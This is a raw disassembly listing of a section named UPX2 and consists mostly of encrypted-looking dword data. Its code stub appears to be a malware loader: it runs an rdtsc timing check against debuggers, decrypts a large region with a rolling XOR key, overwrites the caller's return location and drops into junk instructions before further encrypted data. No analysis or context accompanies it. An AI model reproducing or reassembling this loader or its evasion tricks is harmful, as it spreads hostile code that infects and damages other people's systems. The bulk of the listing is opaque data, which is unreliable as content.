dd 2E9A1227h, 3EB432B0h, 3EBC3CD0h, 40AC1BC0h, 16CC4AC8h
dd 0A9331038h, 0D959D027h, 0E0E454D8h, 566B406Ch, 0F37C72C6h
dd 7ECA427Fh, 3F362E2h, 8E3AB287h, 96149218h, 239C936Dh
dd 0A6129AA9h, 59E9DE29h, 800C3DB5h, 0BE3CBA38h, 465FB648h
dd 0F8744DF5h, 6620D750h, 0E6D467D8h, 9261E256h, 67D16ACFh
dd 0F374C448h, 7B8B640Ch, 6B23A0Fh, 8E8C0A88h, 0AB141BE4h
dd 1EAA221Fh, 0A52D55A2h, 1893E60Dh, 315C32B0h, 0D643C54Bh
dd 0B93BBFA1h, 4ECE3A20h, 0DE49D9D0h, 5DDC6CE7h, 50DBEE7Dh
dd 929582E8h, 0F2FB8D0Fh, 7EFC78A8h, 0B980378Bh, 0D0878A3Eh
dd 7ECA912Ch, 61E36762h, 0A41E202Fh, 0E4ADAA28h, 0B634D214h
dd 0ECC231D8h, 0D23EC116h, 395CB04Bh, 0E06C5DD5h, 0DE5CDA58h
dd 6F709770h, 0D8533AD5h, 6AC17F70h, 757CCC40h, 30946B0Dh
dd 5928F988h, 169E3529h, 1E299798h, 0D5A414B0h, 0CDAC9B0Dh
dd 0C110C1B2h, 884B53Dh, 46C442C0h, 0E04845D8h, 0A9D452D0h
dd 0E83472ABh, 0ED1B9D0Eh, 58D3AA7Dh, 7926F7F0h, 7EFCE27Ch
dd 2B10900h, 50CBC37h, 0DC95825Ah, 9E1CFA3Ch, 0AE6E89C0h
dd 671FA85Bh, 8D20C033h, 882CD3B5h, 0AFC94940h, 0BC4CFC58h
dd 0F2685906h, 0CE357FDBh, 6564E256h, 0EE6C83CFh, 8CFFF270h
dd 0F636FB70h, 0F103F583h, 31148F03h, 936312A6h, 1EAA2217h
dd 26A422E0h, 365B28DCh, 1FB840B3h, 0F209B388h, 0CDC474FFh
dd 7ECD62BBh, 6E5BD727h, 5E9C5AEEh, 649062E0h, 86BD721Fh
dd 890B8EB9h, 7DF091A1h, 0F42FAA73h, 7D5ADB04h, 1B4DCDB4h
dd 0A82406ADh, 76992B20h, 5D2C9C17h, 0B96AED94h, 39B12809h
dd 0C644C295h, 0F6C15F72h, 0D021D266h, 88240831h, 0B6ECF054h
dd 34D40298h, 7D2E0D8Fh, 0B47FF632h, 8901F590h, 0E8C3CB0h
dd 9B841290h, 0DE91FD9h, 1968AF29h, 0ABAF2A9Eh, 368222D9h
dd 3ED59D3Bh, 6DC442C0h, 0C945628Bh, 56D45284h, 6290DF2Fh
dd 66E562D6h, 69986AE8h, 0D6FC3137h, 895CDA58h, 0B03C0D85h
dd 8E0C8A08h, 0C413E690h, 61EBE0F0h, 2BAFF8DFh, 0AE1A95E4h
dd 0FDBDB7D3h, 35315110h, 0F07B0ACDh, 254E2948h, 0FE1F5953h
dd 0E6D35FAFh, 0E667E256h, 0FA18EA68h, 0C9A477FBh, 737FFA4Eh
dd 6B23D3Ch, 31348F8Bh, 1E9512A6h, 958C5013h, 109BAA25h
dd 26E613A8h, 7C3D31C3h, 2EFE3BB0h, 469C2143h, 715CCF43h
dd 0CABC52E6h, 5FDC5AF0h, 67BD6AA2h, 0FB663AABh, 76C24A7Dh
dd 4673FF0Fh, 86048236h, 88789A08h, 867D1F13h, 9EAA9A2Eh
dd 9EAB27D7h, 0AE2CAA1Eh, 0A241B232h, 3BCB7CC6h, 0C672FACFh
dd 0CE48CA48h, 63DED425h, 0DE6AE2D6h, 0DEEB6797h, 0AE6CEA5Eh
dd 0FD01F270h, 3C7EFDF2h, 0E452002Ah, 8485E17Fh, 0BC562097h
dd 0E97ECC9Ah, 0ADC0F093h, 2C234E8Ah, 5E09B1E8h, 3EBC0C87h
dd 0BC1AC6CFh, 0FB33B537h, 56E26D54h, 6562CF27h, 0D31B62D6h
dd 6EDA5568h, 4DC6E70Fh, 0F3717ACEh, 8632BD6Ch, 0B1781F85h
dd 0C4459226h, 2BE39A72h, 0A6129D48h, 959E3FD7h, 3CBB206h
dd 0BE0A8550h, 0FD7657BFh, 7BC1CA7Eh, 0D662EC04h, 0E1386FA7h
dd 1932E256h, 0D85744FDh, 9ED17170h, 0FE7CCC47h, 684EA43h
dd 64D10A88h, 8C799391h, 469C2CAFh, 0A3652D50h, 2E9A3FD0h
dd 0B577F235h, 314CC570h, 53BCC701h, 730F4AFEh, 56FE52C0h
dd 0DFBA46ADh, 0AE8469Ch, 0EFF1F99h, 890BB618h, 96F90F07h
dd 79FB78D4h, 71F358E0h, 693AF3EFh, 0AA4AE235h, 0A6011A32h
dd 464CAA28h, 49CB4D95h, 0FAB7834Dh, 73C9F264h, 0CE7AF41Ch
dd 0B05C82DBh, 0DC5AE0D9h, 8E32C713h, 0EE93EA68h, 0F61E36FBh
dd 6B83AA2Ah, 6B2397Eh, 8F84CE0Bh, 29AB4EAEh, 9D9F6FC4h
dd 0A74C2666h, 0C653D552h, 0C94BCDCFh, 4A04F9D9h, 0ADC442C0h
dd 4EE3F279h, 4B3C52D0h, 9CDC5AD8h, 565C62C0h, 86EC6AE8h
dd 76F472E0h, 0C6FC5E3Ah, 86048385h, 8E0C89E0h, 96385010h
dd 9238CE95h, 5EA78CEDh, 0CE35D628h, 0B634B2D8h, 9A683138h
dd 0DCCF9F70h, 0F63D27C9h, 2BCD266h, 0BFA325B9h, 0E764E6A2h
dd 0EC69ED6Eh, 0D9676073h, 0FF39420Fh, 119415h, 498D01h
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h
dd 40236Fh, 33FE8B50h, 8532ACC9h, 402377h, 8D3B41AAh, 402373h
dd 2BC3EF7Ch, 30FF64C0h, 0B8208964h, 12345678h, 60000387h
dd 83F00000h, 0
dd 26003150h, 280000h, 1AEh dup(0)
dd 7C816FD7h, 100Ah dup(0)
; ---------------------------------------------------------------------------
loc_31512000: ; DATA XREF: UPX2:31514FD4�o
call $+5
clc
mov eax, [esp]
cld
mov [eax+2FCFh], ebx
test dword ptr [eax+288Ah], 80000000h
mov ebx, [esp+4]
jz short loc_3151204D
pop ecx
mov [eax+2FD3h], esi
push edi
pop dword ptr [eax+2FD7h]
cmp byte ptr [eax+288Eh], 0E8h
jnz short loc_31512044
add ebx, [eax+288Fh]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3151204C
; ---------------------------------------------------------------------------
loc_31512044: ; CODE XREF: UPX2:31512035�j
mov ebx, [eax+2890h]
push dword ptr [ebx]
loc_3151204C: ; CODE XREF: UPX2:31512042�j
pop ebx
loc_3151204D: ; CODE XREF: UPX2:3151201E�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 8E05h
sub ebp, 361005h
mov edi, [esp+4]
lea esi, [ebp+36389Ch]
mov ecx, 91h
rep movsb
call sub_315120C2
mov ecx, eax
call sub_315120C2
sub eax, ecx
jz short loc_31512096
cmp eax, 100h
lea eax, [ebp+3610D5h]
ja short loc_31512096
mov dl, [eax-10h]
call sub_315120C6
jmp short loc_315120D5
; ---------------------------------------------------------------------------
loc_31512096: ; CODE XREF: UPX2:3151207D�j
; UPX2:3151208A�j
test dword ptr [ebp+36388Fh], 80000000h
jz short loc_315120C0
lea esi, [ebp+363893h]
mov edi, [esp+4]
movsb
movsd
mov esi, [ebp+363FD8h]
mov edi, [ebp+363FDCh]
mov ebx, [ebp+363FD4h]
loc_315120C0: ; CODE XREF: UPX2:315120A0�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_315120C2 proc near ; CODE XREF: UPX2:3151206F�p
; UPX2:31512076�p
rdtsc
retn
sub_315120C2 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_315120C6 proc near ; CODE XREF: UPX2:3151208F�p
mov dh, dl
mov ecx, 27BAh
loc_315120CD: ; CODE XREF: sub_315120C6+C�j
xor [eax], dl
add dl, dh
inc eax
loop loc_315120CD
retn
sub_315120C6 endp
; ---------------------------------------------------------------------------
loc_315120D5: ; CODE XREF: UPX2:31512094�j
adc ebx, eax
mov al, 0B0h ; CODE XREF: UPX2:315120DB�j
das
lahf
jno short near ptr loc_315120D7+1
pop esi
hlt
; ---------------------------------------------------------------------------
db 58h
dd 789423A9h, 0B1207B81h, 1F15D040h, 73A3D30Bh, 486136FCh
dd 5C55D550h, 0F31880CBh, 10D29B53h, 73F81A4Bh, 0B38DC1F3h
dd 88E1B683h, 45F06482h, 7598D1C9h, 0D461F36Fh, 1A82D534h
dd 19634DD9h, 26B74CCh, 4323C924h, 0BE64674Fh, 33BC6A0Bh
dd 0F7D4DB3Bh, 0BCC86303h, 0B360D040h, 55D37FECh, 148E3188h
dd 0E320F56Ch, 75E906BFh, 30962BB2h, 70E05D28h, 0D552D300h
dd 0B505A421h, 44CE75F6h, 8FB35081h, 86A519D6h, 1860E67Bh
dd 30A0108Dh, 3C943587h, 0F554E361h, 820FA232h, 0E65F4380h
dd 4BDAD549h, 73C89036h, 7560D043h, 33241F40h, 201FAF3Fh
dd 8B1A05FFh, 30E5D076h, 3321958Fh, 0CD6050C0h, 0B016852Eh
dd 0F74A541h, 69FC435h, 5E6DAEC0h, 3F20A615h, 0C67558C5h
dd 0B3A7FB80h, 46F5D865h, 15A39000h, 0F056C538h, 4C059380h
dd 70E066D5h, 0A5A03583h, 0A760D076h, 22739546h, 0F9E150F6h
dd 861BAEB5h, 4D55D40h, 3A02695h, 3A5DDD09h, 120A63Bh
dd 0F3EE3860h, 0CFFF1080h, 46DBDA55h, 0AFC85100h, 0F0B4544Fh
dd 772B1080h, 73A03AD4h, 0A020F8C3h, 75E9D840h, 30962BC2h
dd 708FA4A8h, 4F20FA00h, 0C65B12D5h, 3F609580h, 70E2BE44h
dd 5AD0700h, 0F056C040h, 0CD19FF0Bh, 0F1E050CBh, 863090EDh
dd 0A3F55D40h, 0C3A02692h, 0F302AF65h, 4CABB0ECh, 3053D82Ah
dd 0D359DD9h, 83E066DBh, 39DC1BABh, 0B79EC017h, 33C8479Ch
dd 8FE051C0h, 861BD295h, 0D0A45340h, 0B4AFD005h, 70E0525Fh
dd 0DA20FA97h, 0F460B841h, 30C89080h, 8FE051C0h, 861BD295h
dd 0FFA05540h, 30A29204h, 20E03AC0h, 0B4209068h, 3160BA40h
dd 5AF71C68h, 718800C1h, 4F209100h, 0C65B92D5h, 30AA7880h
dd 0E51F50C1h, 0B016AB42h, 0F060D5A8h, 32F1F980h, 708A50C0h
dd 0DA2A7359h, 46F52F4Ah, 0DBA026BBh, 0CD639331h, 0B016AB62h
dd 0C4E4DF40h, 0D8A01082h, 70E050C6h, 0FC64C44Eh, 659FD00Ch
dd 30962BFEh, 672EE54Dh, 79139036h, 0CBAA6DCDh, 3E1110B6h
dd 7296B853h, 0DA39000h, 0F056EBBEh, 30241F80h, 0FBE050C2h
dd 861B5E85h, 0F1102F40h, 746950Fh, 0F56B50F6h, 0B016ABE6h
dd 7F61A0BFh, 6982305h, 0A265DBC0h, 4F20A63Bh, 75EFD130h
dd 309628BAh, 4B36DD4Bh, 0AAC39036h, 7F61A1BFh, 6985705h
dd 0AE6DDBC0h, 5320A63Bh, 0F1112F49h, 8F4950Fh, 0C80850F6h
dd 3D209001h, 0C65C84FDh, 5A6F9B80h, 8F39A6C0h, 51A39470h
dd 0F320BA43h, 30CA4779h, 0C56D48AAh, 0B01685DBh, 0F060C9F9h
dd 7DA49D80h, 8F1FAF3Eh, 0B4AD3B66h, 0F060D00Dh, 0BD0B7680h
dd 424B5487h, 0B0B51DE4h, 5C60E67Bh, 56A299E6h, 7222D36Bh
dd 64AB65E2h, 408D02Ah, 0BBA010EFh, 0FBE03A0Ch, 0D820FAC4h
dd 0F860D040h, 62F150EAh, 8FB05EAAh, 861B4A95h, 34E38840h
dd 5F5478C0h, 0A46B50C0h, 7CAB906Ah, 0F00A902Ah, 5AF212EAh
dd 1F1438C0h, 0B04A9000h, 0A09FBA11h, 0B42857Fh, 29BF50F6h
dd 342F6F85h, 0F060D147h, 20A0A50Dh, 8D5950F6h, 3B20900Bh
dd 71C523AFh, 6B0106Dh, 4965DDC0h, 4F20A614h, 9A3480A0h
dd 0CF5F7AA0h, 46DBBA55h, 0EFE01500h, 0A088E435h, 0D8A01081h
dd 70E050D1h, 0D564F553h, 0A007A522h, 59D679F2h, 158735ACh
dd 0E1C8C700h, 0F60D045h, 69F4835h, 1E75AFC0h, 0E720A63Bh
dd 0CB5245BFh, 30CA10B6h, 0E51F52AAh, 0B016AB62h, 0F061F8F9h
dd 0D18B8780h, 24C45C49h, 16B56F57h, 0C360E67Bh, 72059376h
dd 70E066FCh, 25DFC754h, 0F056EBEAh, 56D4D005h, 741ED386h
dd 0C4DF7E72h, 0F00AD864h, 0A55F3AEAh, 70D66B62h, 6C545085h
dd 0F5E938D3h, 0F9931080h, 49DAB351h, 861CD285h, 7152A540h
dd 538434FCh, 49322B3h, 28E11128h, 0A060D04Eh, 61F640D4h
dd 8FB30090h, 861BCA95h, 0A9A05540h, 445F1FF4h, 0F56F58E4h
dd 0B016AC42h, 0F9D15A8h, 0A55F437Fh, 70D66BF2h, 74A11EEBh
dd 0F060D168h, 235EFD7h, 8FE066FBh, 861BA295h, 0B083940h
dd 6AA0EF7Fh, 708A50AAh, 0B04A906Ah, 0F460D128h, 5A649B80h
dd 7C8A00C0h, 52DF548Bh, 0C43FA816h, 0F9931080h, 8F1F8A28h
dd 0F8B51DFFh, 0A260E655h, 0CFF041D1h, 46DB6655h, 90E41300h
dd 0F0295D83h, 30F848D8h, 70E07F34h, 0B0209E63h, 0F060D041h
dd 30A01080h, 70E050C0h, 0B020B88Fh, 0F060D040h, 0CFF346D1h
dd 46DB6E55h, 1C793B00h, 0B1510C4h, 0BD63FE62h, 46F92555h
dd 25DFC200h, 0F056EBD6h, 0FF89509h, 660850F6h, 0FC209000h
dd 850BBF2Fh, 59D240F0h, 158C39B6h, 0D176F567h, 0B105A52Ch
dd 0A55F4080h, 70D66BFEh, 8F7C1589h, 0ACA3D076h, 55D371C2h
dd 158D318Eh, 0DA42DF64h, 8314B325h, 63D446DCh, 709433A5h
dd 0C254E36Ch, 0F00EB52Ch, 51C562C3h, 19A635B4h, 0B061F56Ch
dd 9105A203h, 59E675F4h, 11AD35ACh, 0DE49E070h, 0B3609127h
dd 44C175F2h, 1F9200A5h, 0C353F563h, 8223D001h, 55D471E5h
dd 1F8D3592h, 0D874F574h, 9401B532h, 55D25380h, 248524A1h
dd 0D145E268h, 8223D024h, 55D471E5h, 1C8F3F94h, 0C04CF568h
dd 9E33E273h, 58D360E1h, 35E024AFh, 0E454F978h, 9105A228h
dd 59E610E4h, 19B435ACh, 0DF74F56Dh, 8413A913h, 59F47DE5h
dd 36E035ADh, 0FC45F572h, 9112B229h, 77A069F2h, 19A624A5h
dd 0C461F56Ch, 9209A234h, 43C564F5h, 15A75081h, 0DC49D674h
dd 8A098325h, 55E710E5h, 1C8916B4h, 0DD49C465h, 9527D025h
dd 54CF5DF4h, 38853CB5h, 0DC44FE61h, 0B7609125h, 55F464E5h
dd 19A620ADh, 0D16EF56Ch, 0F021B52Dh, 64D475C7h, 20903DA5h
dd 0F148E461h, 84059740h, 43D275D6h, 708E3FA9h, 0E654F547h
dd 9913A225h, 48E57EEFh, 15A75081h, 0DC4FC674h, 0B905BD35h
dd 42CF76EEh, 199431ADh, 0B061FE6Fh, 9401BF0Ch, 42C279CCh
dd 319922A1h, 0C041DD00h, 8705B916h, 59E676CFh, 3FE035ACh
dd 0F64EF570h, 0BD05BC29h, 59D060E1h, 70A137AEh, 0DE45E04Fh
dd 930FA210h, 30D363E5h, 138F2290h, 8353E365h, 82099672h
dd 60A064F3h, 15833FB2h, 8213E373h, 8418B50Eh, 44C54380h
dd 158C3986h, 0C254E441h, 8415B229h, 30E163E5h, 36943593h
dd 0E445FC69h, 0F005BD29h, 55C57CD3h, 9B350B0h, 0DD45E473h
dd 950DB914h, 59E67FD4h, 19B435ACh, 0E520F56Dh, 8001BD2Eh
dd 47C579D6h, 19A6368Fh, 0E620F56Ch, 8514A229h, 5CE17CE1h
dd 70833FACh, 0C449E257h, 9C099625h, 44EE10E5h, 58A3481h
dd 0C270E473h, 9C09A629h, 43C577E5h, 158B3F94h, 0C46E906Eh
dd 9105A203h, 59E675F4h, 3EE035ACh, 0D552D374h, 0A005A421h
dd 55C37FF2h, 3EE023B3h, 0D552D374h, 0A005A421h, 55C37FF2h
dd 8A523B3h, 0F354DE00h, 8401B532h, 53C543E5h, 1E8F39B4h
dd 0F354DE00h, 8401B532h, 55D345E5h, 1F9200B2h, 0C353F563h
dd 0BD149E40h, 59F660E1h, 16AF27A5h, 0C443F553h, 0F00EBF29h
dd 40EF64CEh, 19A63EA5h, 0FE20F56Ch, 95109F34h, 5FD240EEh
dd 39335A3h, 0D54BFF54h, 842ED02Eh, 5EC560CFh, 4833593h
dd 0B04EFF69h, 8230A40Eh, 53C564EFh, 28906B4h, 0DC41E574h
dd 9F0DB50Dh, 7EA069F2h, 159501B4h, 0DE69E972h, 9D12BF26h
dd 5FC964E1h, 1B8F04AEh, 0FE20FE65h, 99128734h, 59F675F4h
dd 119524B2h, 0DD45DD6Ch, 0F019A22Fh, 65CC64D2h, 1F8339AEh
dd 0C473F564h, 970EB932h, 5EE17FD4h, 4B339B3h, 0D74EF972h
dd 0B1338740h, 42C164D3h
dd 709025B4h, 0C34FFC63h, 930FA325h, 30D475EBh, 1E8E3FA3h
dd 0B054F365h, 9814B527h, 52D463EFh, 1D813EB9h, 0D5529065h
dd 8360A623h, 30C47EE5h, 1B833FB3h, 0F920E465h, 8205A42Eh
dd 73D475EEh, 15933FACh, 0D44EF148h, 0B960B52Ch, 42C564EEh
dd 379435AEh, 0DF63E465h, 9305BE2Eh, 63C475F4h, 159431B4h
dd 0C44ED900h, 950EA225h, 55D05FF4h, 39E011AEh, 0C245E46Eh
dd 0BF14B52Eh, 65CE75F0h, 70A13CB2h, 0D554FE49h, 8405BE32h
dd 54C175D2h, 158C3986h, 0E664D100h, 0C3298001h, 7CE43EB2h
dd 15B2508Ch, 0DF4CD367h, 952BB533h, 55F210F9h, 15901FA7h
dd 0C945DB6Eh, 0F021A805h, 61C775D2h, 99235B5h, 0C54CF156h
dd 0B1189525h, 57C54280h, 26943593h, 0D555FC61h, 0F021A805h
dd 5A5623D6h, 0FBB606C2h, 0E221FAD4h, 0A678A2BFh, 0FFC857Fh
dd 0B46B50F6h, 0E076C656h, 0E8102F16h, 0B6A857Fh, 0B46350F6h
dd 0B8E2CE10h, 0B295D40h, 58F1D8ABh, 98E050C0h, 0B304DC8Dh
dd 0F50AD02Ah, 5AF340D1h, 202CDBC5h, 0E470448Bh, 0A231902Ah
dd 0C235EFD3h, 0F3E066FBh, 25DF9CC4h, 0F056EBBAh, 0F3A8D403h
dd 4BE0C54Dh, 79139036h, 9832D02Ah, 309210B0h, 21B1944Bh
dd 0E170D06Ah, 30E3C82Ah, 3ECA4488h, 9E75AF90h, 3320A63Bh
dd 2253F084h, 0A9AFD005h, 283AA702h, 0E7E35223h, 31882F73h
dd 3F5FEF7Fh, 70E0F544h, 4448C000h, 7B60D02Fh, 0BBA07A54h
dd 18A03A0Ch, 0B0309000h, 9A32D22Ah, 5F547880h, 708A50C0h
dd 4F70C351h, 0C65B32D5h, 0CFF94F80h, 46DB6255h, 0C4DF1500h
dd 70ED5B31h, 0D3A02695h, 7075DDCCh, 0B320A610h, 0F338791h
dd 0FE259B52h, 0FDE066FBh, 0B007758Fh, 0F4B3840h, 0B52BEF7Fh
dd 70D66B26h, 98121F8Dh, 0EA88D040h, 0BB5FEF7Fh, 46DB8245h
dd 89AF1D00h, 1860D068h, 0CF5FEF89h, 4B36D54Bh, 70A59036h
dd 7FEDF034h, 30A038C6h, 8F1EA428h, 6EA51BFFh, 7560E67Bh
dd 0BDAB6440h, 70C8034Fh, 4EFF7800h, 37EB2FBFh, 0D8F5D3DFh
dd 70E050C0h, 0A4CD115Dh, 0C360E65Bh, 0A8259D49h, 21E066DEh
dd 0E071C154h, 659F8111h, 30962BDEh, 8FC45447h, 861BA295h
dd 0F4A28D40h, 30484580h, 2DE050C0h, 0AB637D81h, 0F0AD076h
dd 2BAE850Dh, 22B050F6h, 0B004B0CDh, 34E3D06Ah, 0B567768Ch
dd 70D64B94h, 35E7B0CDh, 0F056CB16h, 308A10A4h, 6A8A939Dh
dd 0B0297858h, 0B2EDD040h, 0F95EBAE1h, 1923A0B5h, 861CDC95h
dd 0F8E4D540h, 0A5295288h, 70D66C8Ch, 0E5E372F7h, 0F060D0A8h
dd 0DD214D80h, 70D64B5Dh, 8C700D8Bh, 8CE3D076h, 3FA018A4h
dd 70E0E944h, 0B8CC1100h, 0A460D042h, 30A114E8h, 0F675AFC0h
dd 3B20A63Bh, 0D4E45DBCh, 30A01184h, 98E03A90h, 0B0209004h
dd 0F0328216h, 0B235EFD7h, 43E066FBh, 0B4B71DC9h, 0A160D041h
dd 61A27AD1h, 708851AAh, 0E2609000h, 0CB2E45BFh, 0B53610B6h
dd 20BB2436h, 0B124F854h, 0F37D040h, 32803434h, 0E51F50C0h
dd 0B016AC2Eh, 84A05519h, 60B4F396h, 708A844Bh, 0E677C152h
dd 0CBA645BFh, 0B5F910B6h, 26302500h, 8B1205FFh, 0A7EDD076h
dd 5AF742C4h, 0E76D0884h, 0B0209104h, 9AA0E3EBh, 9B534990h
dd 20B00090h, 0E270C050h, 0CB3645BFh, 0F42110B6h, 70E052C8h
dd 0B804E4FFh, 0CC7E45BFh, 0CFF310B6h, 46DC4E55h, 0B4E2CD00h
dd 0FA5E5040h, 0BBE611F5h, 46F52C4Dh, 3D397300h, 0C670D0D5h
dd 66711380h, 0B064823Fh, 0B13F180Fh, 746FD040h, 30A01190h
dd 5DA6E40h, 8EA0D610h, 0F1E4DF40h, 0B0A01081h, 819570FEh
dd 0E01E1146h, 85279E09h, 0F66F9BC2h, 5BAF5186h, 0B04AC1CEh
dd 0F338611h, 69C0615h, 0B1DB09C0h, 0B0FF150Fh, 75EDD040h
dd 30960E0Ch, 7C8850AAh, 0E0209000h, 0E6F52F13h, 0DA026BCh
dd 70E050CCh, 0B09F150Fh, 4189D040h, 0B1A01080h, 39B200FEh
dd 15A59F56h, 7360D040h, 0C0C1846h, 0E9645FCDh, 8C209000h
dd 5C93A560h, 0B5AF2ABCh, 70E0504Ch, 90009DADh, 0D15DF060h
dd 45D475E7h, 50DCFCBFh, 0CEA1EC75h, 8408F0BFh, 0B1D165F4h
dd 4A9053BEh, 0D855BF2Fh, 0F09F9786h, 201A218Fh, 87E050E7h
dd 25DFC2E2h, 0F056EBF6h, 60F0D0B3h, 79080090h, 0F4209000h
dd 9C0EA72Fh, 30C471EFh, 4CC6C53Fh, 70A59036h, 3953E634h
dd 0CF09509h, 18B150F6h, 30209200h, 0A0368111h, 0C8A857Fh
dd 0E56D50F6h, 0B0168B97h, 0A4A9E310h, 61F240D1h, 2E75AF91h
dd 3720A63Bh, 659FF444h, 30962BB2h, 0FD609338h, 0B016856Fh
dd 9AA32941h, 0CFA17A81h, 7493AFF3h, 70A585FFh, 2B538A34h
dd 3B13C00Bh, 0FDDC00C3h, 863D2BB5h, 0FCDA5B40h, 0BBA01081h
dd 70E1584Ah, 9BD89300h, 3BEBB08Bh, 44C1B673h, 850217C5h
dd 77A3BEEBh, 3CEB834Fh, 60749BD7h, 21A03A94h, 4FDFFA52h
dd 0C65B22D5h, 562D9B80h, 0F3E066FBh, 7F0B9CC4h, 376739C3h
dd 0D8A07A87h, 73AFD9C0h, 0F66FC3C3h, 0A2218714h, 59ED4CC5h
dd 38F22A3h, 0EC54F66Fh, 940EB917h, 6CD367EFh, 2922583h
dd 0E654FE65h, 9913A225h, 75FC7EEFh, 1F8C20B8h, 0B052F572h
dd 9712B114h, 5FE864E5h, 72E024B3h, 0E5709000h, 99B05F32h
dd 1EC473F2h, 168539BAh, 0B04CE02Eh, 0BB23990Eh, 48CE71A0h
dd 6823BB5h, 0E3759A6Eh, 92408205h, 7EE95FCAh, 199676E0h
dd 0BA55E472h, 0F0603815h, 0B1FD1080h, 46FECE2Dh, 0DFA55600h
dd 0F060E655h, 0B2A857Fh, 982150F6h, 0DA1CE41Fh, 0B2D55B5Eh
dd 69A026BBh, 5CE6C6Ch, 8EA1F62Ah, 0D315CDBFh, 0CE6AD0Dh
dd 66B50F6h, 0D685C702h, 4BE55DE5h, 0BFA026B7h, 46D7B145h
dd 0F6A96A00h, 0E2E5CBAh, 0D2A1A17Bh, 98B0BB0Fh, 4FDF6B28h
dd 0F844ACC3h, 0D8E46584h, 70E050C8h, 9E63D653h, 0F02C9C04h
dd 0B36857Fh, 0B0EB50F6h, 0DAB39D74h, 659F8342h, 30962BBEh
dd 9873803Fh, 4FDF6E9Eh, 0F060DBA8h, 73E64380h, 5EB31F9Fh
dd 0B06CDC44h, 0CBF645BFh, 0B34810B6h, 981FAF3Eh, 4FDF6606h
dd 0E2B35DBFh, 0F99310B6h, 4F10D54Dh, 0E1719036h, 0A1308111h
dd 0A55F41D1h, 70D66B52h, 0B0209BE8h, 0B5338540h, 1E9223D2h
dd 70AC1C84h, 8BB605FFh, 0FA88D076h, 47A01080h, 199220B3h
dd 0F146E46Eh, 659F8040h, 30962BBEh, 4BA6D549h, 812F9036h
dd 0E9155DCDh, 0B52910B6h, 70D66C8Ch, 26B56F51h, 6360E67Bh
dd 30A014E8h, 0F255DDC0h, 0E920A619h, 0CC526DCDh, 0F94810B6h
dd 161FAF35h, 0AE4515C7h, 0A060D076h, 2EC7B503h, 0FDE050F6h
dd 863EB595h, 9A348040h, 62A07A81h, 70E052A8h, 86B56F80h
dd 7560E67Ch, 12D54A40h, 6EB8DD4Dh, 0DA729036h, 95D55D46h
dd 64A0269Eh, 21B00096h, 8AB56F52h, 0A860E67Ch, 0C92857Fh
dd 0F52650F6h, 0B016AE53h, 0F06C3840h, 63F71080h, 43AB138Fh
dd 0FC64BE32h, 659FD00Ch, 30962B16h, 70E73853h, 5AD9000h
dd 0F056C899h, 321D9DD9h, 98E066FCh, 4FDF6544h, 0F060DCA8h
dd 7EE94780h, 24A51E89h, 0FC6CD42Eh, 66F52F40h, 0B5A026BBh
dd 45645F00h, 23209002h, 0F060D528h, 27159D80h, 29E066D9h
dd 8C3E2D8Dh, 0FD88D076h, 0B35FEF75h, 46DC727Dh, 342F9000h
dd 0F060D250h, 3130FC01h, 18B450C0h, 0B0209101h, 0CC6245BFh
dd 0F42110B6h, 70E05150h, 0DAF41B50h, 659F8240h, 30962CA2h
dd 5B99045h, 0A3A8F80Dh, 659FD040h, 30962B36h, 0CD63B22Bh
dd 0B0168E67h, 7D49A540h, 6BE7B05h, 0E51F00C0h, 0B016AC0Eh
dd 746F10C5h, 30A01109h
dd 0FBEC104Bh, 3F106F00h, 0C67EB7C5h, 6325D680h, 71E066FEh
dd 0B14A906Ah, 659FD22Ah, 30962C9Ah, 7F1FA843h, 0B021F084h
dd 65ED4340h, 30960EE3h, 23B240AAh, 8C2A05FFh, 30E5D076h
dd 31E0958Fh, 0CD6D50C0h, 0B0168E7Dh, 0B388D8F1h, 585FEF7Ah
dd 70E05054h, 39C6BB5Eh, 0F34F474h, 69B9E15h, 0FB5DDDC0h
dd 120A61Eh, 0A443841h, 0A52DEF7Fh, 70D64EB8h, 0A448906Ah
dd 0A260D040h, 2635EFD3h, 0FDE066FCh, 3D34B444h, 0C65F20D5h
dd 86AF4080h, 54A4DBCAh, 0B8C05114h, 0E2619A42h, 7AB212CAh
dd 54A45BC3h, 0BFC11008h, 0A1683081h, 2084548Bh, 0FDB0623Fh
dd 861CC4BDh, 0F07C3840h, 1E851080h, 5EC028F6h, 8A00BE20h
dd 0DE45F565h, 488568B8h, 7A9375E0h, 0FE69DF4Ah, 0F37D060h
dd 69B5615h, 0DC24D1C0h, 0DA209000h, 0A3378040h, 0CB6857Fh
dd 0FD6B50F6h, 0B0168588h, 0EB83D02Ah, 61ADD9EBh, 70E05528h
dd 0D405B600h, 0F37D04Ah, 69B5615h, 7C24D3C0h, 0D82B7B50h
dd 0F060D047h, 2E31AD0Dh, 23B750F6h, 8C3605FFh, 30E5D076h
dd 852D44FEh, 70D66C94h, 0A5A83583h, 7D60D076h, 69E430Dh
dd 1A2E7BC0h, 0E376C100h, 0CC7245BFh, 0C82310B6h, 0E1CF2EC0h
dd 5AD6E8Bh, 0F056EC14h, 9E521D30h, 988040B5h, 4FDF6A31h
dd 1377A221h, 31D79D89h, 0BF6BBA2Bh, 0DAD5E2Bh, 0F056EC14h
dd 0C727B473h, 8FB3E92Bh, 861C9695h, 9FDD5040h, 31A02695h
dd 40887AB4h, 4F209075h, 0C65B66D5h, 631D9080h, 70E066FEh
dd 35E78174h, 0F056CE27h, 30A01080h, 4EB3D506h, 59209036h
dd 0F9F2E48h, 25D89547h, 70E050F6h, 727D1000h, 0FA6DD044h
dd 5FCE30CFh, 1FC03EAFh, 0D94CB066h, 0D041B526h, 59D430CFh
dd 4C035ADh, 0D543B06Fh, 8202B52Ch, 11C564E1h, 50C05ACDh
dd 0FF00B020h, 9D15A360h, 10D275EDh, 149231A7h, 0BD01FE65h
dd 9C05824Ah, 5CD47EE5h, 1C9323A5h, 0D148B079h, 0D019A030h
dd 10C47EE1h, 159028A5h, 0DE41E463h, 8340FC34h, 54CE71F4h
dd 4A873EA9h, 0BA2DBD20h, 9314B117h, 57CE79E8h, 1C8C31E0h
dd 0C941F420h, 940EB160h, 57C97EA0h, 50CC24A8h, 9052FF66h
